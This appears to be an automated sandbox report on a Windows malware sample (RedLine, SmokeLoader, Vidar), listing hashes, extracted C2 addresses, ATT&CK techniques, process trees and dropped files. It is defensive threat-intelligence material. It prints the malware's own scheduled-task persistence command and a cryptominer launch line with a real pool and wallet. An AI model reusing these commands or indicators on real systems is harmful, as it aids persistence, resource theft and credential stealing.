redline | d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724

Analysis

max time kernel
151s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
07-12-2022 08:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe
Size

274KB
MD5

9546fb20807c47c40959ef3d667385a1
SHA1

b19afbb9a363a8eee215abf99c222c5e03377e50
SHA256

d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724
SHA512

70c3b9f815e40f771576d20c8842e7f6683c8faee108c3e235e0194d2215b2a7f0fabd49a3d99816bdb0d970117277428965065c44acba12b3681112dda7974e
SSDEEP

3072:t1ZnXVmpMlYj9G28bVj1yWP5WlfcJ4kkbidkmZuRT2eaOJHvbPFOZ8DS1usZ00xB:t1hYEj1ERk6HZH8/1usZ00

Score

10^/10

redline smokeloader vidar 1148 yt backdoor discovery evasion infostealer spyware stealer themida trojan

Malware Config

Extracted

Family

vidar

Version

56.1

Botnet

1148

https://t.me/dishasta

https://steamcommunity.com/profiles/76561199441933804

Attributes

profile_id
1148

Extracted

Family

redline

Botnet

65.21.5.58:48811

Attributes

auth_value
fb878dde7f3b4ad1e1bc26d24db36d28

Signatures

Detects Smokeloader packer 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1352-133-0x00000000001F0000-0x00000000001F9000-memory.dmp	family_smokeloader

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

2318.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2318.exe
Downloads MZ/PE file
Executes dropped EXE 8 IoCs

Processes:

2318.exe2461.exe34AE.exe3B85.exe3B85.exe919115414-8a9Ah054og8jEcGP.exeQYdnllWCHB.exeV.exe

pid process

3212 2318.exe
4420 2461.exe
2908 34AE.exe
4020 3B85.exe
2376 3B85.exe
2384 919115414-8a9Ah054og8jEcGP.exe
3152 QYdnllWCHB.exe
4628 V.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2318.exe

pid	process
3212	2318.exe
4420	2461.exe
2908	34AE.exe
4020	3B85.exe
2376	3B85.exe
2384	919115414-8a9Ah054og8jEcGP.exe
3152	QYdnllWCHB.exe
4628	V.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2318.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2318.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2318.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

34AE.exeV.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	34AE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	V.exe

Loads dropped DLL 2 IoCs

Processes:

3B85.exe

pid process

2376 3B85.exe
2376 3B85.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2376	3B85.exe
2376	3B85.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\2318.exe	themida
C:\Users\Admin\AppData\Local\Temp\2318.exe	themida
behavioral1/memory/3212-143-0x0000000000AB0000-0x0000000000FB0000-memory.dmp	themida
behavioral1/memory/3212-171-0x0000000000AB0000-0x0000000000FB0000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

2318.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2318.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

2318.exe

pid process

3212 2318.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2318.exe

pid	process
3212	2318.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

3B85.exe2318.exe2461.exeV.exe

description	pid	process	target process
PID 4020 set thread context of 2376	4020	3B85.exe	3B85.exe
PID 3212 set thread context of 2172	3212	2318.exe	InstallUtil.exe
PID 4420 set thread context of 2452	4420	2461.exe	vbc.exe
PID 4628 set thread context of 1512	4628	V.exe	vbc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

852 4020 WerFault.exe 3B85.exe
1080 2376 WerFault.exe 3B85.exe
4240 4420 WerFault.exe 2461.exe

pid	pid_target	process	target process
852	4020	WerFault.exe	3B85.exe
1080	2376	WerFault.exe	3B85.exe
4240	4420	WerFault.exe	2461.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3B85.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3B85.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3B85.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4308 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3432 timeout.exe

pid	process
4308	schtasks.exe

pid	process
3432	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe

pid	process
1352	d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe
1352	d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3056

pid	process
3056

Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe

pid	process
1352	d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

34AE.exeInstallUtil.exewmic.exe

description	pid	process
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeDebugPrivilege	2908	34AE.exe
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeDebugPrivilege	2172	InstallUtil.exe
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeIncreaseQuotaPrivilege	2924	wmic.exe
Token: SeSecurityPrivilege	2924	wmic.exe
Token: SeTakeOwnershipPrivilege	2924	wmic.exe
Token: SeLoadDriverPrivilege	2924	wmic.exe
Token: SeSystemProfilePrivilege	2924	wmic.exe
Token: SeSystemtimePrivilege	2924	wmic.exe
Token: SeProfSingleProcessPrivilege	2924	wmic.exe
Token: SeIncBasePriorityPrivilege	2924	wmic.exe
Token: SeCreatePagefilePrivilege	2924	wmic.exe
Token: SeBackupPrivilege	2924	wmic.exe
Token: SeRestorePrivilege	2924	wmic.exe
Token: SeShutdownPrivilege	2924	wmic.exe
Token: SeDebugPrivilege	2924	wmic.exe
Token: SeSystemEnvironmentPrivilege	2924	wmic.exe
Token: SeRemoteShutdownPrivilege	2924	wmic.exe
Token: SeUndockPrivilege	2924	wmic.exe
Token: SeManageVolumePrivilege	2924	wmic.exe
Token: 33	2924	wmic.exe
Token: 34	2924	wmic.exe
Token: 35	2924	wmic.exe
Token: 36	2924	wmic.exe
Token: SeIncreaseQuotaPrivilege	2924	wmic.exe
Token: SeSecurityPrivilege	2924	wmic.exe
Token: SeTakeOwnershipPrivilege	2924	wmic.exe
Token: SeLoadDriverPrivilege	2924	wmic.exe
Token: SeSystemProfilePrivilege	2924	wmic.exe
Token: SeSystemtimePrivilege	2924	wmic.exe
Token: SeProfSingleProcessPrivilege	2924	wmic.exe
Token: SeIncBasePriorityPrivilege	2924	wmic.exe
Token: SeCreatePagefilePrivilege	2924	wmic.exe
Token: SeBackupPrivilege	2924	wmic.exe
Token: SeRestorePrivilege	2924	wmic.exe
Token: SeShutdownPrivilege	2924	wmic.exe
Token: SeDebugPrivilege	2924	wmic.exe
Token: SeSystemEnvironmentPrivilege	2924	wmic.exe
Token: SeRemoteShutdownPrivilege	2924	wmic.exe
Token: SeUndockPrivilege	2924	wmic.exe
Token: SeManageVolumePrivilege	2924	wmic.exe
Token: 33	2924	wmic.exe
Token: 34	2924	wmic.exe
Token: 35	2924	wmic.exe
Token: 36	2924	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3B85.exe2318.exe2461.exe

description	pid	process	target process
PID 3056 wrote to memory of 3212	3056		2318.exe
PID 3056 wrote to memory of 3212	3056		2318.exe
PID 3056 wrote to memory of 4420	3056		2461.exe
PID 3056 wrote to memory of 4420	3056		2461.exe
PID 3056 wrote to memory of 4420	3056		2461.exe
PID 3056 wrote to memory of 2908	3056		34AE.exe
PID 3056 wrote to memory of 2908	3056		34AE.exe
PID 3056 wrote to memory of 2908	3056		34AE.exe
PID 3056 wrote to memory of 4020	3056		3B85.exe
PID 3056 wrote to memory of 4020	3056		3B85.exe
PID 3056 wrote to memory of 4020	3056		3B85.exe
PID 4020 wrote to memory of 2376	4020	3B85.exe	3B85.exe
PID 4020 wrote to memory of 2376	4020	3B85.exe	3B85.exe
PID 4020 wrote to memory of 2376	4020	3B85.exe	3B85.exe
PID 4020 wrote to memory of 2376	4020	3B85.exe	3B85.exe
PID 4020 wrote to memory of 2376	4020	3B85.exe	3B85.exe
PID 4020 wrote to memory of 2376	4020	3B85.exe	3B85.exe
PID 4020 wrote to memory of 2376	4020	3B85.exe	3B85.exe
PID 4020 wrote to memory of 2376	4020	3B85.exe	3B85.exe
PID 4020 wrote to memory of 2376	4020	3B85.exe	3B85.exe
PID 3056 wrote to memory of 4684	3056		explorer.exe
PID 3056 wrote to memory of 4684	3056		explorer.exe
PID 3056 wrote to memory of 4684	3056		explorer.exe
PID 3056 wrote to memory of 4684	3056		explorer.exe
PID 3056 wrote to memory of 4796	3056		explorer.exe
PID 3056 wrote to memory of 4796	3056		explorer.exe
PID 3056 wrote to memory of 4796	3056		explorer.exe
PID 3056 wrote to memory of 2064	3056		explorer.exe
PID 3056 wrote to memory of 2064	3056		explorer.exe
PID 3056 wrote to memory of 2064	3056		explorer.exe
PID 3056 wrote to memory of 2064	3056		explorer.exe
PID 3212 wrote to memory of 2172	3212	2318.exe	InstallUtil.exe
PID 3212 wrote to memory of 2172	3212	2318.exe	InstallUtil.exe
PID 3212 wrote to memory of 2172	3212	2318.exe	InstallUtil.exe
PID 3212 wrote to memory of 2172	3212	2318.exe	InstallUtil.exe
PID 3212 wrote to memory of 2172	3212	2318.exe	InstallUtil.exe
PID 3212 wrote to memory of 2172	3212	2318.exe	InstallUtil.exe
PID 3212 wrote to memory of 2172	3212	2318.exe	InstallUtil.exe
PID 3212 wrote to memory of 2172	3212	2318.exe	InstallUtil.exe
PID 3056 wrote to memory of 4320	3056		explorer.exe
PID 3056 wrote to memory of 4320	3056		explorer.exe
PID 3056 wrote to memory of 4320	3056		explorer.exe
PID 3056 wrote to memory of 212	3056		explorer.exe
PID 3056 wrote to memory of 212	3056		explorer.exe
PID 3056 wrote to memory of 212	3056		explorer.exe
PID 3056 wrote to memory of 212	3056		explorer.exe
PID 3056 wrote to memory of 4812	3056		explorer.exe
PID 3056 wrote to memory of 4812	3056		explorer.exe
PID 3056 wrote to memory of 4812	3056		explorer.exe
PID 3056 wrote to memory of 4812	3056		explorer.exe
PID 3056 wrote to memory of 4088	3056		explorer.exe
PID 3056 wrote to memory of 4088	3056		explorer.exe
PID 3056 wrote to memory of 4088	3056		explorer.exe
PID 3056 wrote to memory of 4088	3056		explorer.exe
PID 3056 wrote to memory of 4648	3056		explorer.exe
PID 3056 wrote to memory of 4648	3056		explorer.exe
PID 3056 wrote to memory of 4648	3056		explorer.exe
PID 3056 wrote to memory of 4940	3056		explorer.exe
PID 3056 wrote to memory of 4940	3056		explorer.exe
PID 3056 wrote to memory of 4940	3056		explorer.exe
PID 3056 wrote to memory of 4940	3056		explorer.exe
PID 4420 wrote to memory of 2452	4420	2461.exe	vbc.exe
PID 4420 wrote to memory of 2452	4420	2461.exe	vbc.exe
PID 4420 wrote to memory of 2452	4420	2461.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe
"C:\Users\Admin\AppData\Local\Temp\d25528f63f09cc2b99f33e3ebdebd6c30d0816f5e304d2e913dd0a3ef3624724.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1352

C:\Users\Admin\AppData\Local\Temp\2318.exe
C:\Users\Admin\AppData\Local\Temp\2318.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Users\Admin\AppData\Local\Temp\2461.exe
C:\Users\Admin\AppData\Local\Temp\2461.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4420

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
PID:2452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4420 -s 492
2⤵
- Program crash
PID:4240

C:\Users\Admin\AppData\Local\Temp\34AE.exe
C:\Users\Admin\AppData\Local\Temp\34AE.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Users\Admin\AppData\Local\Temp\919115414-8a9Ah054og8jEcGP.exe
"C:\Users\Admin\AppData\Local\Temp\919115414-8a9Ah054og8jEcGP.exe"
2⤵
- Executes dropped EXE
PID:2384

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2924

C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
3⤵
PID:3800

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
PID:4656

C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
3⤵
PID:4872

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
4⤵
PID:4072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "start-process C:\Users\Admin\AppData\Local\Temp\QYdnllWCHB.exe"
3⤵
PID:2120

C:\Users\Admin\AppData\Local\Temp\QYdnllWCHB.exe
"C:\Users\Admin\AppData\Local\Temp\QYdnllWCHB.exe"
4⤵
- Executes dropped EXE
PID:3152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA7F8.tmp.bat""
5⤵
PID:2996

C:\ProgramData\SystemInformation\V.exe
"C:\ProgramData\SystemInformation\V.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:4628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"
7⤵
PID:636

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"
8⤵
- Creates scheduled task(s)
PID:4308

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RCMiP9SrgQ54AMjhmbUTCtkeoHVVHvADHw.spaceteam -p x -t 5
7⤵
PID:1512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
8⤵
PID:4528

C:\Users\Admin\AppData\Local\Temp\3B85.exe
C:\Users\Admin\AppData\Local\Temp\3B85.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4020

C:\Users\Admin\AppData\Local\Temp\3B85.exe
"C:\Users\Admin\AppData\Local\Temp\3B85.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1740
3⤵
- Program crash
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 308
2⤵
- Program crash
PID:852

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4020 -ip 4020
1⤵
PID:4128

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4796

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2064

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4320

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:212

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4812

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4088

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2376 -ip 2376
1⤵
PID:4488

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4420 -ip 4420
1⤵
PID:4564

C:\Windows\system32\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:3432

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemInformation\V.exe
Filesize
892KB

MD5
6bcdb0510f46aa502aef2378f79434bf

SHA1
f46e3ca6042354f2d81228d3648e8ba5c96b7867

SHA256
8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

SHA512
73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

Download Submit
C:\ProgramData\SystemInformation\V.exe
Filesize
892KB

MD5
6bcdb0510f46aa502aef2378f79434bf

SHA1
f46e3ca6042354f2d81228d3648e8ba5c96b7867

SHA256
8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

SHA512
73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

Download Submit
C:\ProgramData\mozglue.dll
Filesize
133KB

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\nss3.dll
Filesize
1.2MB

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\Users\Admin\AppData\Local\Temp\2318.exe
Filesize
1.5MB

MD5
d1964c1b30d01262eccaee06c600d726

SHA1
e213ef1a963cc1825b9183742bb2af555da72efe

SHA256
06ece311c226daf62863e5791def4efee02dacfeacc6b7635095d0a63b715a99

SHA512
02d5f5d71ef785dbc9a2c7bf960d60a19a7eeba3ae8227442c21ba153fc2443e0d1e5ec8319e70a55defcb1057f43d4f41602ba2089a64615dc3aaa8569d47a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2318.exe
Filesize
1.5MB

MD5
d1964c1b30d01262eccaee06c600d726

SHA1
e213ef1a963cc1825b9183742bb2af555da72efe

SHA256
06ece311c226daf62863e5791def4efee02dacfeacc6b7635095d0a63b715a99

SHA512
02d5f5d71ef785dbc9a2c7bf960d60a19a7eeba3ae8227442c21ba153fc2443e0d1e5ec8319e70a55defcb1057f43d4f41602ba2089a64615dc3aaa8569d47a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2461.exe
Filesize
510KB

MD5
2c7867a1749edef10274f3e34b047865

SHA1
c2009f052e54f3c788e1872e7ac6f4d5fea218f9

SHA256
8845215ed3299ff3381580ab3c1e1feb69d8c44361bc15d64b57a597147a74c7

SHA512
60b503650f7f4ca7d14cfa7dabc1cda68eee8f0e34800fb160f44b3af9135bf27b15c57e26f19301baa1eb4eb6a6191cfa70d8ca28361db71969f7c0c3435e68

Download Submit
C:\Users\Admin\AppData\Local\Temp\2461.exe
Filesize
510KB

MD5
2c7867a1749edef10274f3e34b047865

SHA1
c2009f052e54f3c788e1872e7ac6f4d5fea218f9

SHA256
8845215ed3299ff3381580ab3c1e1feb69d8c44361bc15d64b57a597147a74c7

SHA512
60b503650f7f4ca7d14cfa7dabc1cda68eee8f0e34800fb160f44b3af9135bf27b15c57e26f19301baa1eb4eb6a6191cfa70d8ca28361db71969f7c0c3435e68

Download Submit
C:\Users\Admin\AppData\Local\Temp\34AE.exe
Filesize
922KB

MD5
0cec15477b0a89e89f78961fdd2f56b8

SHA1
48701957b74b12cfb521c8881ec9beac78f8866d

SHA256
03de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351

SHA512
1c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595

Download Submit
C:\Users\Admin\AppData\Local\Temp\34AE.exe
Filesize
922KB

MD5
0cec15477b0a89e89f78961fdd2f56b8

SHA1
48701957b74b12cfb521c8881ec9beac78f8866d

SHA256
03de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351

SHA512
1c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B85.exe
Filesize
2.4MB

MD5
01feb918a545bdd899e53b48da0063f5

SHA1
7c781b33fb1cbc1008aac592d04be87889758755

SHA256
a568f2f61c9c6b33a66f9f8f5cd0c3918baf556035e55d91ed737dc4f69bf0e9

SHA512
e552cf33e26b7dfcdabb5c4c4af965ecf754a1a689c97d2b8cc62c4dcd76c134d57485500b0885497e83da36da3eedd6a4c93ad8dc4e1e13662e684de30685f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B85.exe
Filesize
2.4MB

MD5
01feb918a545bdd899e53b48da0063f5

SHA1
7c781b33fb1cbc1008aac592d04be87889758755

SHA256
a568f2f61c9c6b33a66f9f8f5cd0c3918baf556035e55d91ed737dc4f69bf0e9

SHA512
e552cf33e26b7dfcdabb5c4c4af965ecf754a1a689c97d2b8cc62c4dcd76c134d57485500b0885497e83da36da3eedd6a4c93ad8dc4e1e13662e684de30685f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B85.exe
Filesize
2.4MB

MD5
01feb918a545bdd899e53b48da0063f5

SHA1
7c781b33fb1cbc1008aac592d04be87889758755

SHA256
a568f2f61c9c6b33a66f9f8f5cd0c3918baf556035e55d91ed737dc4f69bf0e9

SHA512
e552cf33e26b7dfcdabb5c4c4af965ecf754a1a689c97d2b8cc62c4dcd76c134d57485500b0885497e83da36da3eedd6a4c93ad8dc4e1e13662e684de30685f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\919115414-8a9Ah054og8jEcGP.exe
Filesize
4.5MB

MD5
210d0e2a6972569ae0cc2e191610ede7

SHA1
74080b265b2f29cc0d2fac5b02034a9c4b6c9f22

SHA256
bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d

SHA512
d7b51dd3334c37fbabc0c0047debfc52e7febc1a590a9974bbc0453d035b3b340b35eb0f4ab3d15c235a4f4d7092915e86a3d805fc173d21a1c7fdde12a94e2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\919115414-8a9Ah054og8jEcGP.exe
Filesize
4.5MB

MD5
210d0e2a6972569ae0cc2e191610ede7

SHA1
74080b265b2f29cc0d2fac5b02034a9c4b6c9f22

SHA256
bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d

SHA512
